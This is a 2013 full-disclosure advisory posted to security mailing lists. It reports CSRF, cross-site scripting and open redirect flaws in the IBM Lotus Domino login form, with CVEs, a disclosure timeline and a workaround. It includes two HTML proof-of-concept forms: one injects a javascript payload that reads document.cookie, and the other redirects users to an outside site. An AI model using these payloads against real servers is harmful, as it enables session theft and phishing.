Date: Fri, 15 Feb 2013 20:22:02 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: CSRF,
	XSS and Redirector vulnerabilities in IBM Lotus Domino

Hello list!

These are Cross-Site Request Forgery, Cross-Site Scripting and Redirector
vulnerabilities in IBM Lotus Domino. At 30th of November IBM released the
advisory concerning these vulnerabilities.

CVE ID: CVE-2012-4842, CVE-2012-4844.
SecurityVulns ID: 12789.

IBM Security Bulletin for Open Redirect and Cross-Site Scripting
vulnerabilities:

-------------------------
Affected products:
-------------------------

Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. These
vulnerabilities will be fixed in Domino 9.0 and IBM are still working on
other vulnerabilities, about which I've informed them. Lotus Domino 9.0
should be released at 14.03.2013.

Before release of new version all users of affected versions of IBM Lotus
Domino are vulnerable to these attacks. And IBM didn't fix these holes in
current 8.5.x series, only in new 9.0 series. At that they didn't offer any
workaround or mitigation for these issues. But I'll offer such workaround
(see bellow), which can be used before release of version 9.0 with fixes of
these vulnerabilities.

----------
Details:
----------

Cross-Site Request Forgery (WASC-09):

Lack of captcha in login form (http://site/names.nsf) can be used for
different attacks - for CSRF-attack to login into account (remote login - to
conduct attacks on vulnerabilities inside of account), for XSS attacks, for
redirect, for Brute Force (which I described in other advisory) and other
automated attacks. Which you can read about in the article "Attacks on
unprotected login forms"
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html).

Examples of attacks on XSS and Redirector vulnerabilities with using of this
CSRF vulnerability are provided bellow.

Cross-Site Scripting (WASC-08):

For attack it's needed to use working login and password at the site (i.e.
the attacker needs to use existent account at the site - his own or
someone's account, to which he got access via Brute Force vulnerability).

Exploit:

http://websecurity.com.ua/uploads/2013/IBM%20Lotus%20Domino%20Redirector.html

<form name="hack" action="http://site/names.nsf?Login" method="post">
<input type="hidden" name="Username" value="login">
<input type="hidden" name="Password" value="password">
<input type="hidden" name="RedirectTo"
value="javascript:alert(document.cookie)">
</form>

Redirector (URL Redirector Abuse) (WASC-38):

For attack it's needed to use working login and password at the site (i.e.
the attacker needs to use existent account at the site - his own or
someone's account, to which he got access via Brute Force vulnerability).

Exploit:

http://websecurity.com.ua/uploads/2013/IBM%20Lotus%20Domino%20Redirector.html

<form name="hack" action=http://site/names.nsf?Login method="post">
<input type="hidden" name="Username" value="login">
<input type="hidden" name="Password" value="password">
<input type="hidden" name="RedirectTo" value="http://websecurity.com.ua">
</form>

-----------------
Workaround:
-----------------

My workaround for these vulnerabilities is the next: turn off html-form for
login and use Basic Authentication instead.

------------
Timeline:
------------

Full timeline read in the first advisory
(http://securityvulns.ru/docs28474.html).

- During 16.05-20.05 I've wrote announcements about multiple vulnerabilities
in IBM software at my site.
- During 16.05-20.05 I've wrote five advisories via contact form at IBM
site.
- At 31.05 I've resend five advisories to IBM PSIRT, which they received and
said they would send them to the developers (of Lotus products).
- At 30.11.2012 IBM released their advisory (about Cross-Site Scripting and
Redirector holes).
- At 14.12.2012 I've informed SecurityVulns about it.
- At 15.02.2013 I've disclosed these vulnerabilities at my site
(http://websecurity.com.ua/5835/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site